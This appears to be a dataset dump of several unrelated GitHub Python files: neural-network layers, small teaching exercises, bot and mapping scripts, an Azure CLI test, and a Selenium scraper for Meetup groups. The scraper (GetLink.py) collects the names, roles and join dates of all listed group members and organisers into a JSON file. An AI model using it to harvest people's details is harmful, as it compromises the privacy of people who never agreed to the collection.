np.zeros((m, n_C, n_H, n_W)) \r\n \r\n ### START CODE HERE ###\r\n for i in range(m): # loop over the training examples\r\n for h in range(n_H): # loop on the vertical axis of the output volume\r\n for w in range(n_W): # loop on the horizontal axis of the output volume\r\n for c in range (n_C): # loop over the channels of the output volume\r\n \r\n # Find the corners of the current \"slice\" (≈4 lines)\r\n vert_start = h*self.stride\r\n vert_end = h*self.stride +self.f\r\n horiz_start = w*self.stride\r\n horiz_end = w*self.stride + self.f\r\n \r\n # Use the corners to define the current slice on the ith training example of A_prev, channel c. (≈1 line)\r\n a_prev_slice = input_A.matrix[i, c, vert_start:vert_end, horiz_start:horiz_end]\r\n \r\n # Compute the pooling operation on the slice. Use an if statment to differentiate the modes. 
Use np.max/np.mean.\r\n if self.mode == \"max\":\r\n A[i, c, h, w] = np.max(a_prev_slice)\r\n elif self.mode == \"average\":\r\n A[i, c, h, w] = np.mean(a_prev_slice)\r\n \r\n ### END CODE HERE ###\r\n \r\n # Making sure your output shape is correct\r\n assert(A.shape == (m, n_C, n_H, n_W))\r\n self.matrix = A\r\n return parameter(A)\r\n\r\n def backward(self, up_grad):\r\n m,n_C_prev, n_H_prev, n_W_prev = self.A.shape\r\n m, n_C, n_H, n_W = up_grad.shape\r\n dA_prev = np.zeros(self.A.shape)\r\n \r\n for i in range(m): # loop over the training examples\r\n a_prev = self.A()[i]\r\n for h in range(n_H): # loop on the vertical axis\r\n for w in range(n_W): # loop on the horizontal axis\r\n for c in range(n_C): # loop over the channels (depth)\r\n vert_start = h\r\n vert_end = vert_start + self.f\r\n horiz_start = w\r\n horiz_end = horiz_start + self.f\r\n # Compute the backward propagation in both modes.\r\n if self.mode == \"max\":\r\n a_prev_slice = a_prev[c, vert_start:vert_end, horiz_start:horiz_end]\r\n mask = self.create_mask_from_window(a_prev_slice)\r\n dA_prev[i, c, vert_start:vert_end, horiz_start:horiz_end] += np.multiply(mask, up_grad.matrix[i, c, h, w])\r\n \r\n elif self.mode == \"average\":\r\n da = up_grad.matrix[i, c, h, w]\r\n shape = (self.f, self.f)\r\n dA_prev[i, c, vert_start:vert_end, horiz_start:horiz_end] += self.distribute_value(da, shape)\r\n \r\n ### END CODE ###\r\n \r\n # Making sure your output shape is correct\r\n assert(dA_prev.shape == self.A.shape)\r\n self.dA = parameter(matrix=dA_prev)\r\n return self.dA\r\n\r\n def update(self, lr = 1):\r\n self.A = self.A - self.dA.multiply_constant(lr)\r\n self.dA = parameter(matrix=np.array([]))\r\n return \r\n\r\nclass relu(operation):\r\n def __init__(self):\r\n super().__init__()\r\n\r\n def forward(self, input_A):\r\n self.A = input_A\r\n self.matrix = np.maximum(0,input_A.matrix)\r\n return parameter(self.matrix)\r\n\r\n def backward(self, up_grad):\r\n self.dA = parameter(np.multiply(np.where(self.A.matrix < 0, 0,1), up_grad.matrix))\r\n return self.dA\r\n\r\n def update(self,lr = 1):\r\n self.A = self.A - self.dA.multiply_constant(lr)\r\n self.dA = parameter(matrix=np.array([]))\r\n return\r\n\r\nclass fully_connection(operation):\r\n def __init__(self, in_num, out_num):\r\n super().__init__()\r\n self.W = parameter(matrix=np.random.rand(in_num, out_num)/100)\r\n self.b = parameter(matrix=np.random.rand(out_num)/100)\r\n self.dW = parameter(matrix=np.zeros((in_num, out_num)))\r\n self.db = parameter(matrix=np.zeros(out_num))\r\n\r\n def forward(self, input_A):\r\n self.A = input_A\r\n batch = input_A.shape[0]\r\n reshape_input = input_A.matrix.reshape(batch, -1)\r\n Z = np.dot(reshape_input, self.W.matrix) + self.b.matrix.T\r\n self.matrix = Z\r\n return parameter(Z)\r\n\r\n def backward(self, up_grad):\r\n batch = self.A.shape[0]\r\n self.dA = parameter(np.dot(up_grad.matrix, self.W.matrix.T).reshape(self.A.shape))\r\n self.dW = self.dW + parameter(matrix=np.dot(self.A.matrix.reshape(batch,-1).T,up_grad.matrix))\r\n self.db = self.db + parameter(matrix=np.sum(up_grad.matrix, axis=0))\r\n return self.dA\r\n\r\n def update(self,lr):\r\n self.A = self.A - self.dA.multiply_constant(lr)\r\n self.dA = parameter(matrix=np.array([]))\r\n self.b = self.b - self.db.multiply_constant(lr)\r\n self.db = parameter(matrix=np.zeros_like(self.db))\r\n self.W = self.W - self.dW.multiply_constant(lr)\r\n self.dW = parameter(matrix=np.zeros_like(self.dW.matrix))\r\n return \r\n\r\nclass softmax_crossentropy(operation):\r\n def 
__init__(self):\r\n        super().__init__()\r\n\r\n    def __call__(self, input_A, target):\r\n        self.A = input_A\r\n        self.target = target\r\n        return super().__call__(input_A)\r\n\r\n    def softmax(self,x):\r\n        x = x.matrix\r\n        for batch in range(x.shape[0]):\r\n            sum = np.sum(np.exp(x[batch].astype('float')))\r\n            x[batch,:] = np.exp(x[batch,:].astype('float'))/sum\r\n        return x\r\n\r\n    def forward(self,input_A):\r\n        loss = -np.sum(np.multiply(self.target.matrix==1, np.log(self.softmax(input_A).astype('float'))))\r\n        self.matrix = loss\r\n        return parameter(loss)\r\n\r\n    def backward(self):\r\n        da_prev = self.A - self.target\r\n        self.dA =da_prev\r\n        return self.dA\r\n\r\n    def update(self, lr):\r\n        self.A = self.A - self.dA.multiply_constant(lr)\r\n        self.dA = parameter(matrix=np.array([0]))\r\n        return\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    a = conv2D()\r\n    b = pure_data(matrix=np.random.rand(2,3))\r\n    target = pure_data(matrix=np.array([[1,0,0],[0,1,0]]))\r\n    pool = pooling_2D()\r\n    relu1 = relu()\r\n    fc = fully_connection(9, 10)\r\n    loss_fn = softmax_crossentropy()\r\n    print(loss_fn(b,target).matrix)\r\n    print(loss_fn.backward().shape)","repo_name":"TingHsuanLin-hub/LeNet-5","sub_path":"handcrafted_nn/operation.py","file_name":"operation.py","file_ext":"py","file_size_in_byte":15026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"35606382678","text":"import re\n# assumption: LooseVersion here is the classic distutils version class\nfrom distutils.version import LooseVersion\n\n\ndef parse_requirements(requirements):\n    \"\"\"Parse a requirement into a module and version parts.\"\"\"\n    reqs = {}\n    for req in requirements.splitlines():\n        match = re.match('^([^>=<]+)([>=<]+)([^>=<]+)$', req)\n        module = match.group(1)\n        compare = match.group(2)\n        version = LooseVersion(match.group(3))\n        reqs[module] = {'compare': compare, 'version': version}\n    return reqs
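\n\n\n# Minimal usage sketch (the example input is mine, not from the original repo):\nif __name__ == \"__main__\":\n    # prints roughly: {'numpy': {'compare': '>=', 'version': LooseVersion('1.16')}}\n    print(parse_requirements(\"numpy>=1.16\"))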
","repo_name":"gersteinlab/BioCoder","sub_path":"evaluation/Fuzzer/test_functions/python_test_function_5/golden.py","file_name":"golden.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"5"} +{"seq_id":"2228806188","text":"\nclass Student:\n\n    def __init__(self, name, rollno):\n        self.name = name\n        self.rollno = rollno\n        self.lap = self.Laptop()\n\n    def show(self):\n        print(self.name, self.rollno)\n\n    class Laptop:\n        def __init__(self):\n            self.brand = 'HP'\n            self.cpu = 'i5'\n            self.ram = \"8GB\"\n\n        def show(self):\n            print(self.brand, self.cpu, self.ram)\n\n\n\ns1 = Student('Navin', 2)\ns2 = Student('Jenny', 3)\n\ns1.show()\nprint(s1.lap.brand)\nlap1 = Student.Laptop()\nlap1.show()\n","repo_name":"cartosat/python_base","sub_path":"oops/inner_class.py","file_name":"inner_class.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"6781238256","text":"from art import logo\nimport random\n\nEASY_DIFFICULTY = 10\nHARD_DIFFICULTY = 5\n\n\ndef difficulty():\n    if input(\"Choose a difficulty. Type 'easy' or 'hard': \") == \"easy\":\n        return EASY_DIFFICULTY\n    else:\n        return HARD_DIFFICULTY\n\n\ndef check_answer(guess, the_number, lives):\n    \"\"\"Checks answer against guess. Returns the number of turns remaining\"\"\"\n    if guess == the_number:\n        print(f\"You got it! The answer was {the_number}.\")\n        return lives\n    elif guess < the_number:\n        print(\"Too low.\")\n        return lives - 1\n    elif guess > the_number:\n        print(\"Too high.\")\n        return lives - 1\n\n\ndef game():\n    print(logo)\n    print(\"Welcome to the Number Guessing Game!\")\n    print(\"I'm thinking of a number between 1 and 100.\")\n    the_number = random.randint(1, 100)\n    print(f\"Pssst, the correct answer is {the_number}\")\n    lives = difficulty()\n    guess = 0\n\n    while not guess == the_number:\n        print(f\"You have {lives} attempts remaining to guess the number.\")\n        guess = int(input(\"Make a guess: \"))\n        lives = check_answer(guess, the_number, lives)\n        if lives == 0:\n            print(\"You've run out of guesses, you lose.\")\n            return\n        elif guess != the_number:\n            print(\"Guess again\")\n\n\n\ngame()\n","repo_name":"powas/100DaysOfCodeTheCompletePythonProBootcamp","sub_path":"012/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"40151955338","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/12/30 16:11\n# @Author : Michael Zhang\n# @Site : \n# @File : FindKthTotail.py\n# @Software: Sublime\n\n'''\nQ: Given a linked list, output the k-th node from the end of the list.\n\nA: Keep two pointers, both starting at the head. Move the first pointer forward k-1 steps so it sits on the k-th node, then advance both pointers together;\nwhen the first pointer reaches the tail node, the second pointer is on the k-th node from the end. Mind the edge cases: an empty list, k = 0, and k greater than the length of the list.\n'''\nclass ListNode:\n\tdef __init__(self, x):\n\t\tself.val = x\n\t\tself.next = None\n\nclass Solution:\n\tdef FindKthToTail(self, head, k):\n\t\tif head == None or k <= 0:\n\t\t\treturn None\n\t\tpAhead = head\n\t\tpBhead = None\n\n\t\tfor i in range(k-1):\n\t\t\tif pAhead.next != None:\n\t\t\t\tpAhead = pAhead.next\n\t\t\telse:\n\t\t\t\treturn None\n\t\tpBhead = head\n\n\t\twhile pAhead.next != None:\n\t\t\tpAhead = pAhead.next\n\t\t\tpBhead = pBhead.next\n\t\treturn pBhead\n\t\t","repo_name":"Michaelhuazhang/code_offer","sub_path":"findKtail.py","file_name":"findKtail.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"73017310233","text":"def robin_queue(n, m, c):\n    pizza = [(i + 1, int(c[i])) for i in range(m)]\n    # pizzas currently in the oven\n    pizza_oven = pizza[:n]\n    # pizzas still waiting\n    pizza_left = pizza[n:]\n\n    while len(pizza_oven) != 1:\n        num, cheese = pizza_oven.pop(0)\n        cheese //= 2\n\n        if cheese:\n            pizza_oven.append((num, cheese))\n        else:\n            if pizza_left:\n                pizza_oven.append(pizza_left.pop(0))\n    \n\n    return pizza_oven.pop()\n\n\n\n# read the number of test cases\ntry:\n    test_case = int(input('Enter the number of test cases: '))\nexcept ValueError:\n    print('ValueError : Wrong Number!!')\nif not(1 <= test_case <= 50):\n    raise ValueError\n\n\nfor t in range(1, test_case + 1):\n    n, m = map(int, input('Enter the oven size n and the number of pizzas m: ').split())\n    c = list(map(int, input('Enter the amount of cheese on each pizza: ').split()))\n    \n    pizza_num = robin_queue(n, m, c)\n\n    print(f'#{t} {pizza_num[0]}')","repo_name":"hawk90/NDD_study","sub_path":"SW-Academy/luann9711/queue/queue_3.py","file_name":"queue_3.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"14886345544","text":"import os\nimport sys\nimport logging\nimport file_utils\nimport utils\nimport static\nimport classes\nimport configparser\nimport traceback\nfrom enum import Enum\n\nimport wiki\nfrom classes import Action\n\n### Logging setup ###\nLOG_LEVEL = logging.DEBUG\nif not os.path.exists(static.LOG_FOLDER_NAME):\n\tos.makedirs(static.LOG_FOLDER_NAME)\nLOG_FILENAME = 
static.LOG_FOLDER_NAME + \"/\" + \"bot.log\"\nLOG_FILE_BACKUPCOUNT = 5\nLOG_FILE_MAXSIZE = 1024 * 256 * 64\n\nclass ContextFilter(logging.Filter):\n\tdef filter(self, record):\n\t\trecord.gameid = static.logGameId\n\t\treturn True\n\nlog = logging.getLogger(\"bot\")\nlog.setLevel(LOG_LEVEL)\nlog_formatter = logging.Formatter('%(asctime)s - %(levelname)s:%(gameid)s %(message)s')\nlog_stdHandler = logging.StreamHandler()\nlog_stdHandler.setFormatter(log_formatter)\nlog.addHandler(log_stdHandler)\nlog.addFilter(ContextFilter())\nif LOG_FILENAME is not None:\n\tlog_fileHandler = logging.handlers.RotatingFileHandler(LOG_FILENAME, maxBytes=LOG_FILE_MAXSIZE, backupCount=LOG_FILE_BACKUPCOUNT)\n\tlog_fileHandler.setFormatter(log_formatter)\n\tlog.addHandler(log_fileHandler)\n\n\ndef addWinnerFieldToGames():\n\tfolder = static.SAVE_FOLDER_NAME\n\tfor fileName in os.listdir(folder):\n\t\tif not os.path.isfile(os.path.join(folder, fileName)):\n\t\t\tcontinue\n\t\tgame = file_utils.loadGameObject(fileName)\n\t\tgame.status.winner = None\n\t\tfor status in game.previousStatus:\n\t\t\tstatus.winner = None\n\t\t\tfile_utils.saveGameObject(game)\n\n\ndef archiveOutstandingFinishedGames():\n\tfolder = static.SAVE_FOLDER_NAME\n\tfor fileName in os.listdir(folder):\n\t\tif not os.path.isfile(os.path.join(folder, fileName)):\n\t\t\tcontinue\n\t\tgame = file_utils.loadGameObject(fileName)\n\t\tif game.status.quarterType == classes.QuarterType.END:\n\t\t\tfile_utils.archiveGameFile(game.thread)\n\n\ndef replaceEnums(d):\n\tnewd = {}\n\tfor k, v in d.items():\n\t\tif isinstance(k, Enum):\n\t\t\tk = k.name\n\t\tif isinstance(v, dict):\n\t\t\tnewd[k] = replaceEnums(v)\n\t\telif isinstance(v, Enum):\n\t\t\tnewd[k] = v.name\n\t\telse:\n\t\t\tnewd[k] = v\n\treturn newd\n\n\ndef testPlaysTimes():\n\twiki.loadPlays()\n\tlog.info(f\"Loaded plays: {len(wiki.plays)}\")\n\tlog.info(str(replaceEnums(wiki.plays)))\n\twiki.loadTimes()\n\tlog.info(f\"Loaded times: {len(wiki.times)}\")\n\tlog.info(str(replaceEnums(wiki.times)))\n\n\ndef pastebinPlaylist(game_id, config_section):\n\tgame = file_utils.loadGameObject(game_id)\n\tplayBldr = []\n\tfor play in game.status.plays:\n\t\tplayBldr.append(str(play))\n\tplayString = '\\n'.join(playBldr)\n\tgistId = utils.paste(\n\t\t\"Thread summary\",\n\t\t''.join(playString),\n\t\tconfig_section['gist_username'],\n\t\tconfig_section['gist_token']\n\t)\n\tlog.info(static.GIST_BASE_URL + config_section['gist_username'] + \"/\" + gistId)\n\n\ndef archiveEndedGames():\n\tfor gameFile in os.listdir(static.SAVE_FOLDER_NAME):\n\t\ttry:\n\t\t\tgame = file_utils.loadGameObject(gameFile)\n\t\t\tif game.status.waitingAction == Action.END:\n\t\t\t\tfile_utils.archiveGameFile(gameFile)\n\t\texcept Exception as err:\n\t\t\tlog.warning(\"Can't archive game: {}\".format(gameFile))\n\t\t\tlog.warning(traceback.format_exc())\n\n\ndef loadPrintStrings():\n\twiki.loadStrings()\n\tfor key in wiki.strings:\n\t\tlog.info(key)\n\t\tfor item in wiki.strings[key]:\n\t\t\tlog.info(f\" {item}\")\n\n\nif len(sys.argv) < 2:\n\tprint(\"No arguments\")\n\tsys.exit(0)\n\nconfig = configparser.ConfigParser()\nif 'APPDATA' in os.environ: # Windows\n\tos_config_path = os.environ['APPDATA']\nelif 'XDG_CONFIG_HOME' in os.environ: # Modern Linux\n\tos_config_path = os.environ['XDG_CONFIG_HOME']\nelif 'HOME' in os.environ: # Legacy Linux\n\tos_config_path = os.path.join(os.environ['HOME'], '.config')\nelse:\n\tlog.error(\"Couldn't find config\")\n\tsys.exit()\nos_config_path = os.path.join(os_config_path, 
'praw.ini')\nconfig.read(os_config_path)\n\nfunctionName = sys.argv[1]\nif functionName == \"testPlaysTimes\":\n\ttestPlaysTimes()\nelif functionName == \"pastebinPlaylist\":\n\tpastebinPlaylist(\"test\", config['Watchful1BotTest'])\nelif functionName == \"archiveEndedGames\":\n\tarchiveEndedGames()\nelif functionName == \"testStrings\":\n\tloadPrintStrings()\n","repo_name":"Watchful1/CFBRef","sub_path":"src/scripts.py","file_name":"scripts.py","file_ext":"py","file_size_in_byte":3955,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"5"} +{"seq_id":"40001428315","text":"#!/usr/bin/env python\n\nimport sys\nsys.path.append('./venv/Lib/site-packages')\n\n#mapping imports\nimport folium\nfrom folium.plugins import MarkerCluster\n\n#source code is public but the database password must be kept secret sorry.\nsys.path.append('../../databaseSecret')\nfrom database import config\n\n#reading from a mysql server that's hosted on the dal servers\nimport mysql.connector\nconnection = mysql.connector.connect(**config)\n\ncursor = connection.cursor()\nquery = (\"SELECT * FROM VetMSingleTable\")\ncursor.execute(query)\nresult = cursor.fetchall()\nfor row in result:\n    print(row)\n\ncoords_ns = [45.24664938443739, -63.24613206184815]\nmap = folium.Map(location=coords_ns, zoom_start=8)\n\nlatitude = 45.24\nlongitude = -63.246\n\ntuple = (latitude, longitude)\ntuple2 = (45.30, -63.25)\n\npoints = [tuple, tuple2]\n\nfolium.PolyLine(points).add_to(map)\n\n\n\nmap.save('ns_map.html')\n\n\n","repo_name":"nathanbowley98/VeteransMemorialHospital","sub_path":"mapping/mapping.py","file_name":"mapping.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"27768820008","text":"from selenium import webdriver\nfrom selenium.webdriver import ActionChains\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport pandas as pd\n\nimport time\n\nPATH= \"C:\\Program Files (x86)\\chromedriver.exe\"\ndriver = webdriver.Chrome(PATH)\n\ndriver.get(\"https://www.meetup.com/de-DE/\") #Site to scrape\n\narr= []\ntry:\n    search = WebDriverWait(driver, 10).until(\n        EC.presence_of_element_located((By.ID, \"navbar_search_input_id\"))\n    )\n\n    search.send_keys(\"Medizin\") #replace the search topic here\n    search.send_keys(Keys.RETURN)\n\n    ortSuch = WebDriverWait(driver, 10).until(\n        EC.presence_of_element_located((By.XPATH, \"(//a[@class='dropdown-toggle'])[2]\"))\n    )\n\n    ortSuch.send_keys(Keys.RETURN)\n\n    locationFind = WebDriverWait(driver, 10).until(\n        EC.presence_of_element_located((By.ID, \"locationSearch\"))\n    )\n\n    locationFind.send_keys(\"B\")\n    time.sleep(2)\n    locationFind.send_keys(\"e\")\n    time.sleep(2)\n    locationFind.send_keys(\"r\")\n    # locationFind.send_keys(Keys.RETURN)\n\n    time.sleep(4)\n\n    location = WebDriverWait(driver, 10).until(\n        EC.presence_of_element_located((By.LINK_TEXT, \"Berlin, Deutschland\"))\n    )\n\n    location.click()\n\n    time.sleep(4)\n\n    art = WebDriverWait(driver, 10).until(\n        EC.presence_of_element_located((By.CLASS_NAME, 'groupCard--gradient'))\n    )\n\n    elements = driver.find_elements_by_xpath(\"//h3[contains(@class,'padding-none inline-block')]\")\n\n    time.sleep(3)\n    cityArray = []\n    name = []\n\n    
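# collect the group names shown on the results page (one h3 per group card)\n    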
for element in elements:\n        print(element.text)\n        name.append(element.text)\n\n    mitgliedern = driver.find_elements_by_xpath(\"//p[@class='small ellipsize']\")\n\n    anzahlMitglieder = []\n    for mitglieder in mitgliedern:\n        print(mitglieder.text)\n        anzahlMitglieder.append(mitglieder.text)\n\n    urls = []\n    i=0\n    for i in range(len(elements)):\n        try:\n            p = driver.find_element_by_xpath('//*[@id=\"simple-view\"]/div[1]/ul/li[{}]/div/a[2]'.format(i + 1))\n            url = p.get_attribute('href')\n            urls.append(url)\n        except Exception as s:\n            print(s)\n            pass\n\n    infosArray = []\n    beschreibubg =\"NONE\"\n    for e in urls:\n        gruppeMitgliederInfos = []\n        scrollMitglieder = True\n        mehrBool = True\n        j = 0\n        b = True\n        t= True\n        pp = 1\n        driver.get(e)\n        time.sleep(3)\n        mehrLesen = driver.find_element_by_xpath('//*[@id=\"overview\"]/div/div/button')\n        time.sleep(5)\n        actions = ActionChains(driver)\n        actions.move_to_element(mehrLesen).perform()\n        mehrLesen.click()\n        time.sleep(3)\n        beschreibung = driver.find_element_by_xpath(\"(//p[@class='group-description margin--bottom'])[2]\")\n        beschreibugText = beschreibung.text\n        print(beschreibung.text)\n        time.sleep(3)\n        try:\n            alleMitgliederButton = driver.find_element_by_xpath('//*[@id=\"members\"]/div[1]/div[2]/a')\n            time.sleep(5)\n            actions = ActionChains(driver)\n            actions.move_to_element(alleMitgliederButton).perform()\n            alleMitgliederButton.click()\n            time.sleep(3)\n            for h in range(4): #scroll down up to four times so the 'Mehr Anzeigen' (show more) button becomes visible\n                inDerNaehe = driver.find_element_by_xpath('//*[@id=\"mupMain\"]/div[5]/div/section/div[1]/div/div[1]/h4')\n                actions = ActionChains(driver)\n                actions.move_to_element(inDerNaehe).perform()\n                time.sleep(3)\n            while(mehrBool==True):#keep clicking 'Mehr Anzeigen' until there is none left\n                try:\n                    mehrMit = driver.find_element_by_xpath('//*[@id=\"member-list-card-id\"]/div[3]/div[2]/button')\n                    mehrMit.click()\n                    actions = ActionChains(driver)\n                    actions.move_to_element(inDerNaehe).perform()\n                    time.sleep(3)\n                except:\n                    pass\n                    mehrBool = False\n            mitgliederLocalise = WebDriverWait(driver, 10).until(\n                EC.presence_of_element_located((By.XPATH, '//*[@id=\"member-list-card-id\"]/div[3]/div[1]'))\n            )\n            while (t == True): #once we reach the end of the list, collect the data of the group's members\n                try:\n                    mitgName = driver.find_element_by_xpath('//*[@id=\"member-list-card-id\"]/div[3]/div[1]/ul/li[{}]/div/div[2]/div[1]/div/a/h4'.format(pp + 1))\n                    mitgEintritt = driver.find_element_by_xpath('//*[@id=\"member-list-card-id\"]/div[3]/div[1]/ul/li[{}]/div/div[2]/div[2]'.format(pp+1))\n                    pp = pp + 1\n                    gruppeMitgliederInfos.append((mitgName.text,mitgEintritt.text))\n                except:\n                    t = False\n                    pass\n            print(pp) #sanity check that all members were emitted\n            print(len(gruppeMitgliederInfos))\n        except:\n            pass\n        cityName = driver.find_element_by_class_name(\"groupHomeHeaderInfo-cityLink\").text\n        grName = driver.find_element_by_class_name(\"groupHomeHeader-groupNameLink\").text\n        anzahlMit = driver.find_element_by_class_name(\"groupHomeHeaderInfo-memberLink\").text\n        organisator = driver.find_element_by_xpath('//*[@id=\"mupMain\"]/div[1]/div/section/div/div[2]/div/div[2]/div/div/div[3]/div/div/div/div[2]/a')\n        findOrga = organisator.get_attribute('href')\n        driver.get(findOrga)\n        time.sleep(3)\n        fuehrgunsTeamElements = WebDriverWait(driver, 10).until(\n            EC.presence_of_element_located((By.XPATH, '//*[@id=\"member-list-card-id\"]/div[2]/div/ul'))\n        )\n        print(\"ddd\")\n\n        orgArray = []\n        
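# accumulators for the leadership-team rows scraped in the loop below\n        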
stelleArray=[]\n while (b==True):\n try:\n fuehrgunsTeam = driver.find_element_by_xpath('//*[@id=\"member-list-card-id\"]/div[2]/div/ul/li[{}]/div/div[2]/div[1]/div/a/h4'.format(j + 1))\n stelle = driver.find_element_by_xpath('//*[@id=\"member-list-card-id\"]/div[2]/div/ul/li[{}]/div/div[2]/div[2]/div/span'.format(j+1))\n beigetretenAm = driver.find_element_by_xpath('//*[@id=\"member-list-card-id\"]/div[2]/div/ul/li[{}]/div/div[2]/div[2]/span'.format(j+1))\n j =j+1\n orgArray.append((fuehrgunsTeam.text, stelle.text,beigetretenAm.text))\n print(fuehrgunsTeam.text)\n print(stelle.text)\n print(beigetretenAm.text)\n except:\n b = False\n pass\n infosArray.append((grName, cityName, anzahlMit, e, orgArray, beschreibugText, gruppeMitgliederInfos))\n time.sleep(3)\n\n\nexcept Exception as s:\n print(s)\n\n\n\n\ndata_df = pd.DataFrame(data=infosArray,columns=['GruppenName','Location','Anzahl Mitglieder','Link','Organisatoren','Beschreibung','MitgliderInfos'])\n\ndata_df.to_json('e.json', orient='index', default_handler=str)\n\n# data_df = pd.read_json('a.json', orient='index')\n\n","repo_name":"ramirouatbi/Python-Meetup-Scraper","sub_path":"GetLink.py","file_name":"GetLink.py","file_ext":"py","file_size_in_byte":7291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"40115511218","text":"import os\nimport unittest\n\nfrom azure.cli.testsdk.scenario_tests import AllowLargeResponse\nfrom azure.cli.testsdk import (ScenarioTest, ResourceGroupPreparer)\nfrom azure.cli.core.azclierror import ArgumentUsageError, InvalidArgumentValueError\n\n\nTEST_DIR = os.path.abspath(os.path.join(os.path.abspath(__file__), '..'))\n\n\nclass OperationsScenarioTest(ScenarioTest):\n\n @ResourceGroupPreparer(parameter_name='resource_group_1')\n @ResourceGroupPreparer(parameter_name='resource_group_2')\n @ResourceGroupPreparer(parameter_name_for_location='location')\n def test_log_analytics_solution(self, resource_group_1, resource_group_2, location):\n\n self.kwargs.update({\n 'loc': location,\n 'workspace_name': self.create_random_name('workspace', 20),\n 'rg': resource_group_1,\n 'rg2': resource_group_2,\n 'sub': self.get_subscription_id(),\n 'la_prop_path': os.path.join(TEST_DIR, 'log_analytics.json')\n })\n self.kwargs['solution_type'] = 'Containers'\n self.kwargs['solution_name'] = self.kwargs['solution_type'] + '(' + self.kwargs['workspace_name'] + ')'\n\n workspace = self.cmd('resource create -g {rg} -n {workspace_name} -l {loc} --resource-type '\n 'Microsoft.OperationalInsights/workspaces -p @\"{la_prop_path}\"').get_output_in_json()\n self.kwargs.update({\n 'workspace_resource_id': workspace['id'],\n 'wrong_workspace_resource_id': workspace['id'][1:]\n })\n\n with self.assertRaises(InvalidArgumentValueError) as err:\n self.cmd('az monitor log-analytics solution create '\n '--resource-group {rg} '\n '--solution-type {solution_type} '\n '--workspace \"{wrong_workspace_resource_id}\" ')\n self.assertTrue(\"InvalidArgumentValue: --workspace: Invalid format: resource id should be in '/subscriptions/{subscription}/resourceGroups/{resource_group}/providers/Microsoft.OperationalInsights/workspaces/{}' format.\" == err.exception)\n\n with self.assertRaises(ArgumentUsageError) as err:\n self.cmd('az monitor log-analytics solution create '\n '--resource-group {rg2} '\n '--solution-type {solution_type} '\n '--workspace \"{workspace_resource_id}\" ')\n self.assertTrue(\"usage error: workspace and solution must be under the same resource group\" == err.exception)\n\n 
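# happy path (reviewer note): create the solution in the same resource group as\n        # the workspace, then verify the show/update/list/delete round-trip below\n        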
self.cmd('az monitor log-analytics solution create '\n '--resource-group {rg} '\n '--solution-type {solution_type} '\n '--workspace \"{workspace_resource_id}\" '\n '--tags key1=value1',\n checks=[self.check('name', '{solution_name}')])\n\n self.cmd('az monitor log-analytics solution show --resource-group {rg} --name {solution_name}',\n checks=[self.check('name', '{solution_name}'),\n self.check('plan.publisher', 'Microsoft'),\n self.check('plan.product', 'OMSGallery/Containers'),\n self.check('tags', {'key1': 'value1'})])\n\n self.cmd('az monitor log-analytics solution update --resource-group {rg} --name {solution_name} '\n '--tags key2=value2',\n checks=[self.check('name', '{solution_name}'),\n self.check('tags', {'key2': 'value2'})])\n\n self.cmd('az monitor log-analytics solution show --resource-group {rg} --name {solution_name}',\n checks=[self.check('name', '{solution_name}'),\n self.check('plan.publisher', 'Microsoft'),\n self.check('plan.product', 'OMSGallery/Containers'),\n self.check('tags', {'key2': 'value2'})])\n\n self.kwargs['workspace_name2'] = self.create_random_name('workspace', 20)\n self.cmd('resource create -g {rg2} -n {workspace_name2} -l {loc} --resource-type '\n 'Microsoft.OperationalInsights/workspaces -p @\"{la_prop_path}\"').get_output_in_json()\n self.kwargs['solution_name2'] = 'Containers(' + self.kwargs['workspace_name2'] + ')'\n\n self.cmd('az monitor log-analytics solution create '\n '--resource-group {rg2} '\n '-t {solution_type} '\n '--workspace \"{workspace_name2}\" '\n '--tags key3=value3',\n checks=[self.check('name', '{solution_name2}')])\n\n self.cmd('az monitor log-analytics solution list --query \"value[?name==\\'{solution_name}\\']\"',\n checks=[self.check('length([])', 1)])\n\n self.cmd('az monitor log-analytics solution list --resource-group {rg2} '\n '--query \"value[?name==\\'{solution_name2}\\']\" ',\n checks=[self.check('length([])', 1)])\n\n self.cmd('az monitor log-analytics solution delete --resource-group {rg} --name {solution_name} -y',\n checks=[])\n\n self.cmd('az monitor log-analytics solution delete --resource-group {rg2} --name {solution_name2} -y',\n checks=[])\n\n self.cmd('az resource delete -g {rg} -n {workspace_name} --resource-type '\n 'Microsoft.OperationalInsights/workspaces', checks=[])\n\n self.cmd('az resource delete -g {rg2} -n {workspace_name2} --resource-type '\n 'Microsoft.OperationalInsights/workspaces', checks=[])\n\n self.cmd('az monitor log-analytics solution list --query \"value[?name==\\'{solution_name}\\']\"',\n checks=[self.check('length([])', 0)])\n\n self.cmd('az monitor log-analytics solution list --resource-group {rg2} '\n '--query \"value[?name==\\'{solution_name2}\\']\" ',\n checks=[self.check('length([])', 0)])\n","repo_name":"Azure/azure-cli-extensions","sub_path":"src/log-analytics-solution/azext_log_analytics_solution/tests/latest/test_log_analytics_solution_scenario.py","file_name":"test_log_analytics_solution_scenario.py","file_ext":"py","file_size_in_byte":5830,"program_lang":"python","lang":"en","doc_type":"code","stars":350,"dataset":"github-code","pt":"5"} +{"seq_id":"3474254567","text":"\"\"\"\nCreated on Sat Nov 13 12:50 2021\n\n@author: Andrea Antonelli.\n\nFunctions to calculate the population Fisher matrix for a 